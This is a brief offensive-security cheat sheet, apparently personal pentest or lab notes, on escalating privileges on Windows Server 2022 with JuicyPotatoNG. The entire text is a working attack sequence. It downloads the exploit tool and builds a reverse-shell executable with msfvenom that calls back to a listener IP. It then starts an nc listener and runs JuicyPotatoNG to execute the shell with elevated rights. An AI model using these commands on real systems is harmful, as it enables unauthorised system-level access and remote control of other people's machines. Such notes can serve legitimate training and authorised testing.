JuicyPotatoNG
For latest window server 2022 , it will work
- Download from here https://github.com/antonioCoco/JuicyPotatoNG/releases/tag/v1.1
- msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.148 LPORT=139 -a x64 --platform Windows -f exe -o shell.exe
- transfer both
- nc -nvlp 139
- ./JuicyPotatoNG.exe -t * -p C:\Windows\Tasks\shell.exe -l 443